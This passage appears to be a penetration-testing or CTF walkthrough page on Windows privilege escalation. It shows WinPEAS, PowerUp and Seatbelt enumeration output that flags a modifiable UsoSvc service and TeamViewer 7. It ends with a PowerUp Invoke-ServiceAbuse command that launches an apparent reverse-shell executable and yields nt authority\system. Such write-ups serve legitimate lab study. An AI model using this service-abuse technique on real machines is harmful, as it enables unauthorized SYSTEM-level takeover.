6 privesc

PEAS

[+] Modifiable Services
[?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
UsoSvc: AllAccess, Start

[+] Current TCP Listening Ports
Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name
127.0.0.1             5939          0.0.0.0               0               Listening         2992            TeamViewer_Service

PowerUp.ps1

[*] Checking service permissions...
ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'

Seatbelt.exe

====== InstalledProducts ======

  DisplayName                    : TeamViewer 7
  DisplayVersion                 : 7.0.43148
  Publisher                      : TeamViewer
  InstallDate                    : 1/1/0001 12:00:00 AM
  Architecture                   : x86

AUTOMATED EXPLOITATION USING POWERUP.PS1

Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command 'C:\users\public\documents\rev.exe'
# nt authority\system

Previous7 privesc UsoSvc Next5 RCE

Last updated 4 years ago